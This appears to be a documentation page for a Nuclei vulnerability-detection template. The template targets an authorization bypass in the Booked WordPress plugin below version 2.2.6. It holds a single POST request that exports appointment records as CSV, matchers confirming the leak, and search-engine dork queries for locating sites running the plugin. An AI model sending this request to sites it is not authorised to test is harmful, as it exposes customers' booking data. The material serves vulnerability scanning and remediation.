Skip to content

Booked < 2.2.6 - Broken Authentication

ID: booked-export-csv

Severity: high

Author: random-robbie

Tags: wordpress,wpscan,wp-plugin,wp,booked,bypass

The Booked plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on several functions hooked via AJAX actions in versions up to, and including, 2.2.5. This makes it possible for authenticated attackers with subscriber-level permissions and above to execute several unauthorized actions.

id: booked-export-csv
info:
name: Booked < 2.2.6 - Broken Authentication
author: random-robbie
severity: high
description: |
The Booked plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on several functions hooked via AJAX actions in versions up to, and including, 2.2.5. This makes it possible for authenticated attackers with subscriber-level permissions and above to execute several unauthorized actions.
remediation: Fixed in version 2.2.6
reference:
- https://codecanyon.net/item/booked-appointments-appointment-booking-for-wordpress/9466968
- http://boxyupdates.com/changelog.php?p=booked
- https://wpscan.com/vulnerability/10107
classification:
cpe: cpe:2.3:a:twinkletoessoftware:booked:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: twinkletoessoftware
product: booked
fofa-query: "wp-content/plugins/booked/"
publicwww-query: "/wp-content/plugins/booked/"
google-query: inurl:"/wp-content/plugins/booked/"
tags: wordpress,wpscan,wp-plugin,wp,booked,bypass
http:
- raw:
- |
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
booked_export_appointments_csv=
matchers-condition: and
matchers:
- type: word
part: body
words:
- "End Time"
- "Start Time"
- "Calendar"
condition: and
- type: word
part: header
words:
- text/csv
- type: status
status:
- 200
# digest: 4b0a004830460221008fd44a85810e6edc3925c1645d3dcdf1513ad8ac491df1e07c67110f1d016cf50221009fc76d3aa551969b995e84f87c5611e85b17884e2cd11d09a4ff124009793acd:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/wordpress/booked-export-csv.yaml"

View on Github